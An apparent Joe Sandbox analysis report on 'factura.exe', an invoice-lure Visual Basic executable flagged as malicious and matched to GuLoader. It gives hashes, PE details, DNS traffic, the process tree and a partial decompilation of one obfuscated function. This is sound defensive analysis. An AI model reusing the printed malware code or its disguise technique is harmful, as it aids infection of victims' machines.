Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 95.3% (good quality ratio 66.7%) Quality average: 41.5% Quality standard deviation: 34.2%
HCA Information:	Successful, ratio: 69% Number of executed functions: 15 Number of non-executed functions: 28
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.82.209.183, 23.10.249.26, 23.10.249.43, 104.42.151.234, 104.43.193.48, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129, 20.82.210.154, 172.217.168.14 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.437166061311082
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	factura.exe
File size:	57344
MD5:	5950cbe94b3b5dedbf7b75fa1b95ac84
SHA1:	797bb1231483bb11279f6e63fbb5d675bda58f2a
SHA256:	73f2aa87dad06704e8bbd41fb7449a987dc089160a12ba5e13d7d7f6f4196a4f
SHA512:	6e1f38b5f3d257a2d7926213a4ec6947882b6f38bbac8f42e9d0b3a92762494eeec21920e9ef6cf8440e7298aa2fe1eb73c51ce1c8ec1bc4abae14b2d32b1811
SSDEEP:	768:1hk5+yYZnkRUpyncqBRccge9kk1nA36yY1SoqOiiy:1a5+yk/AnbBTbkmA33RoqOe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....-l`.....................0....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x40169c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x606C2D85 [Tue Apr 6 09:44:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b983fc96c0bd34be8388eeea33042759

Entrypoint Preview

Instruction
push 0040192Ch
call 00007F99E4BE87C5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], bl
mov word ptr [edi], cs
mov eax, 4C003ABAh
lahf
js 00007F99E4BE8768h
push es
stosd
or dh, byte ptr [ecx]
add dword ptr [eax], 00000000h
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ecx+00h], al
xchg byte ptr [eax-7Eh], dl
add dword ptr [ebx+4Bh], edx
inc ebp
dec ebp
inc ecx
inc esi
dec edi
push edx
dec ebp
inc ebp
push edx
add byte ptr [ecx+ebp+00000312h], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, 02836AD0h
fmul qword ptr [ecx-66h]
dec edi
cdq
mov seg?, word ptr [esi]
call far B4BBh : 29F2388Ch
mov al, E7h
in al, 5Eh
dec esp
cdq
xchg eax, ebx
push ebx
push eax
fcmovu st(0), st(6)
jp 00007F99E4BE8787h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [ebx+00h], cl
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx+ebp*2+73h], al
insd
imul ebp, dword ptr [esi+69h], 0D006E6Fh
add dword ptr [edx], ecx
add byte ptr [eax+61h], dh
imul esi, dword ptr [edx+70h], 00000069h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xada4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x9f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa3b8	0xb000	False	0.535866477273	data	6.30476552767	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xc000	0x11b4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x9f0	0x1000	False	0.181884765625	data	2.17356537605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xe8c0	0x130	data
RT_ICON	0xe5d8	0x2e8	data
RT_ICON	0xe4b0	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xe480	0x30	data
RT_VERSION	0xe150	0x330	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaAryMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaI2Str, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVar2Vec, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collutions
InternalName	kvalifikationen
FileVersion	1.00
CompanyName	Collutions
LegalTrademarks	Collutions
Comments	Collutions
ProductName	Collutions
ProductVersion	1.00
FileDescription	Creepy Collutions
OriginalFilename	kvalifikationen.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 20:44:25.018028021 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:25.033273935 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:26.235450983 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:26.249053001 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:27.647319078 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:27.659986973 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:28.400440931 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:28.413872957 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:29.390337944 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:29.403570890 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:30.673795938 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:30.687885046 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 8, 2021 20:44:55.153501987 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:44:55.170157909 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:01.328985929 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:01.348550081 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:03.537647963 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:03.550663948 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:06.732263088 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:06.745244026 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:07.484611988 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:07.500202894 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:08.270230055 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:08.283471107 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:09.470990896 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:09.483995914 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:10.602649927 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:10.615151882 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:11.359272003 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:11.371999025 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:14.906299114 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:14.919040918 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:17.433084011 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:17.545129061 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:18.292279005 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:18.384068012 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:18.545285940 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:18.560043097 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:18.794848919 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:18.807977915 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:19.152693987 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:19.168514967 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:19.253931046 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:19.266459942 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:19.693877935 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:19.706681013 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.001358032 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.014388084 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.123475075 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.139849901 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.176346064 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.190529108 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.374970913 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.407475948 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.519582033 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.611478090 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:20.647066116 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:20.661165953 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:21.215986967 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:21.229494095 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:22.265459061 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:22.280459881 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:22.594882011 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:22.648865938 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 8, 2021 20:45:34.037904024 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:45:34.058129072 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 8, 2021 20:46:05.813369036 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:46:05.828219891 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 8, 2021 20:46:09.114721060 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:46:09.143913984 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 8, 2021 20:46:34.451797009 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 8, 2021 20:46:34.480366945 CEST	53	55916	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: factura.exe PID: 7088 Parent PID: 5892

General

Start time:	20:44:30
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\factura.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\factura.exe'
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	5950CBE94B3B5DEDBF7B75FA1B95AC84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5420 Parent PID: 7088

General

Start time:	20:46:23
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\factura.exe'
Imagebase:	0x310000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 5388 Parent PID: 7088

General

Start time:	20:46:24
Start date:	08/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\factura.exe'
Imagebase:	0x800000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5392 Parent PID: 5388

General

Start time:	20:46:24
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: factura.exe PID: 7088 Parent PID: 5892 factura.exeCOMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	1.7%
Signature Coverage:	1%
Total number of Nodes:	299
Total number of Limit Nodes:	16

Executed Functions

Function 0040169C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 325
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 004016A1

Strings

VB5!6&*, xrefs: 0040169C

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 9814345e06fa9b9c5461a8003243bef284d040dba379b1faf58db90840576db5
Instruction ID: 5487e01e75c205a120487ae8b0414bebd790cc329bbddb10ac4434718c237bc6
Opcode Fuzzy Hash: 9814345e06fa9b9c5461a8003243bef284d040dba379b1faf58db90840576db5
Instruction Fuzzy Hash: 15A1556244E3C19FD3078BB48D656A17FB4AE1321470E45EBC8C1DF0B3D22D995AC766

Uniqueness

Uniqueness Score: -1.00%

Function 00407E34, Relevance: 133.7, APIs: 57, Strings: 19, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00407E34(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v3;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				short _v28;
				short _v32;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v64;
				char _v68;
				short _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				short _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _v112;
				char _v120;
				char _v124;
				intOrPtr _v132;
				char _v140;
				char* _v148;
				intOrPtr _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v196;
				intOrPtr _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed int _t389;
				signed int _t396;
				signed int _t408;
				signed int _t414;
				signed int _t434;
				signed int _t440;
				signed int _t445;
				signed int _t450;
				signed int _t453;
				signed int _t464;
				signed int _t469;
				signed int _t477;
				signed int _t482;
				signed int _t492;
				signed int _t498;
				char* _t508;
				intOrPtr* _t510;
				char* _t511;
				signed int _t519;
				char* _t539;
				char* _t542;
				char* _t546;
				void* _t571;
				void* _t574;
				intOrPtr* _t575;
				intOrPtr* _t576;

				_t575 = _t574 - 0xc;
				 *[fs:0x0] = _t575;
				L00401420();
				_v16 = _t575;
				_v12 = 0x401218;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_t368 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t571);
				_push(" tt");
				L00401672();
				L00401678();
				_push(_t368);
				_push(0x4026a0);
				L0040167E();
				asm("sbb eax, eax");
				_v216 =  ~( ~( ~_t368));
				L0040166C();
				if(_v216 != 0) {
					if( *0x40c33c != 0) {
						_v232 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v232 = 0x40c33c;
					}
					_v216 =  *_v232;
					_v148 = L"Reklappers";
					_v156 = 8;
					_v132 = 0xbc;
					_v140 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t519 =  *((intOrPtr*)( *_v216 + 0x38))(_v216, 0x10, 0x10,  &_v120);
					asm("fclex");
					_v220 = _t519;
					if(_v220 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x4026d4);
						_push(_v216);
						_push(_v220);
						L00401654();
						_v236 = _t519;
					}
					_push( &_v120);
					_push( &_v124);
					L00401660();
					_push( &_v124);
					_push( &_v96);
					L00401666();
					L0040164E();
				}
				_v112 = 0x5518;
				_v120 = 2;
				_t373 =  &_v120;
				_push(_t373);
				L00401648();
				L00401678();
				_push(_t373);
				_push(L"Integer");
				L0040167E();
				asm("sbb eax, eax");
				_v216 =  ~( ~( ~_t373));
				L0040166C();
				L0040164E();
				_t377 = _v216;
				if(_t377 != 0) {
					_push(0x8a);
					L00401642();
					_v80 = _t377;
				}
				L0040163C();
				_v160 = 0x3b49;
				_v172 = 0x741641;
				_v88 =  *0x401210;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v100,  &_v172, 0xc9bfd870, 0x5b04,  &_v160,  &_v100);
				L0040166C();
				_v172 = 0x13a44f;
				_v160 = 0x3145;
				L0040163C();
				 *_t575 =  *0x40120c;
				_t389 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v100,  &_v100,  &_v160, 0xdf661,  &_v172);
				_v216 = _t389;
				if(_v216 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v240 = _t389;
				}
				L0040166C();
				_v188 = 0x1d6641b0;
				_v184 = 0x5af8;
				L0040163C();
				_v172 = 0x10e569;
				_t396 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v172,  &_v100,  &_v188,  &_v176);
				_v216 = _t396;
				if(_v216 >= 0) {
					_v244 = _v244 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v244 = _t396;
				}
				_v68 = _v176;
				L0040166C();
				_v180 =  *0x401208;
				_v176 =  *0x401204;
				L0040163C();
				_v172 =  *0x401200;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v100,  &_v176,  &_v180);
				L0040166C();
				L0040163C();
				_t539 =  &_v100;
				L0040163C();
				_v172 =  *0x4011f8;
				_t408 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v100, _t539, _t539,  &_v104, 0x1107);
				_v216 = _t408;
				if(_v216 >= 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v248 = _t408;
				}
				L00401636();
				_t576 = _t575 + 0xc;
				_t414 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x75a4, 0x3c4f,  &_v160, 2,  &_v100,  &_v104);
				_v216 = _t414;
				if(_v216 >= 0) {
					_v252 = _v252 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v252 = _t414;
				}
				_v32 = _v160;
				_v188 =  *0x4011f0;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v188, L"keelboatman", 0x2307, 0x6481cb);
				_v160 = 0x68a6;
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v160, L"kartoffelkurens");
				_v172 = 0x2abe7a;
				L0040163C();
				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v100, 0x4f9d,  &_v172, 0x18c9);
				L0040166C();
				_t542 =  &_v100;
				L0040163C();
				_v172 = 0x4d098c;
				_v188 = 0xcfcfeb70;
				_v184 = 0x5af4;
				_v268 =  *0x4011e8;
				_t434 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x3414,  &_v188, _t542, _t542,  &_v172, L"Udsendes4",  &_v100);
				_v216 = _t434;
				if(_v216 >= 0) {
					_v256 = _v256 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v256 = _t434;
				}
				L0040166C();
				_v188 =  *0x4011e0;
				_v160 = 0x6b6;
				_v172 =  *0x4011d8;
				_t440 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x1a40b7,  &_v172, L"Skibakker3",  &_v160,  &_v188);
				_v216 = _t440;
				if(_v216 >= 0) {
					_v260 = _v260 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v260 = _t440;
				}
				L0040163C();
				_t445 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v100, "lon",  &_v160);
				_v216 = _t445;
				if(_v216 >= 0) {
					_v264 = _v264 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v264 = _t445;
				}
				_v72 = _v160;
				L0040166C();
				_t450 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v172);
				_v216 = _t450;
				if(_v216 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x4024b4);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v268 = _t450;
				}
				_v40 = _v172;
				_t453 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v216 = _t453;
				if(_v216 >= 0) {
					_v272 = _v272 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x402484);
					_push(_a4);
					_push(_v216);
					L00401654();
					_v272 = _t453;
				}
				while(1) {
					_v132 = 1;
					_v140 = 2;
					L0040162A();
					_t546 =  &_v64;
					L00401630();
					_v204 = 0x4f19e8c0;
					_v200 = 0x5af7;
					_v196 =  *0x4011d0;
					_v160 = 0x454c;
					_v188 = 0xd97a0bc0;
					_v184 = 0x5afd;
					 *_t576 =  *0x4011c8;
					_t464 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t546, _t546, 0x50e1e2,  &_v188,  &_v160,  &_v196,  &_v204,  &_v212,  &_v120,  &_v140,  &_v64);
					_v216 = _t464;
					if(_v216 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
